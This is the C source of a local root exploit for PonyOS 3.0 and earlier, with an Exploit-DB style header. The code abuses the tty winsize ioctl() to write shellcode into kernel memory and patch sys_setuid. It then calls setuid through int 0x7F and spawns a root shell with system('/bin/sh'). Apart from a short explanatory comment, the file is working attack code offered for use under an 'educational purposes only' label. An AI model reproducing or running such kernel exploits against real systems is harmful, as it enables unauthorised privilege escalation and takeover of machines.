49 lines
No EOL
1.4 KiB
C
49 lines
No EOL
1.4 KiB
C
/*
|
|
# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit
|
|
# Google Dork: [if applicable]
|
|
# Date: 29th June 2015
|
|
# Exploit Author: HackerFantastic
|
|
# Vendor Homepage: www.ponyos.org
|
|
# Software Link: [download link if available]
|
|
# Version: [app version] PonyOS <= 3.0
|
|
# Tested on: PonyOS 3.0
|
|
# CVE : N/A
|
|
|
|
# Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c
|
|
*/
|
|
|
|
/* PonyOS <= 3.0 tty ioctl() root exploit
|
|
========================================
|
|
PonyOS 0.4.99-mlp had two kernel vulnerabilities
|
|
disclosed in April 2013 that could be leveraged
|
|
to read/write arbitrary kernel memory. This is
|
|
due to tty winsize ioctl() allowing to read/write
|
|
arbitrary memory. This exploit patches the setuid
|
|
system call to remove a root uid check allowing
|
|
any process to obtain root privileges.
|
|
|
|
John Cartwright found these flaws and others here:
|
|
https://www.exploit-db.com/exploits/24933/
|
|
|
|
Written for educational purposes only. Enjoy!
|
|
|
|
-- prdelka
|
|
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/ioctl.h>
|
|
|
|
int main(){
|
|
struct winsize ws;
|
|
printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n");
|
|
memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8);
|
|
ioctl(0, TIOCSWINSZ, &ws);
|
|
ioctl(0, TIOCGWINSZ, (void *)0x0010f101);
|
|
printf("[-] patched sys_setuid()\n");
|
|
__asm("movl $0x18,%eax");
|
|
__asm("xorl %ebx,%ebx");
|
|
__asm("int $0x7F");
|
|
printf("[-] Got root?\n");
|
|
system("/bin/sh");
|
|
} |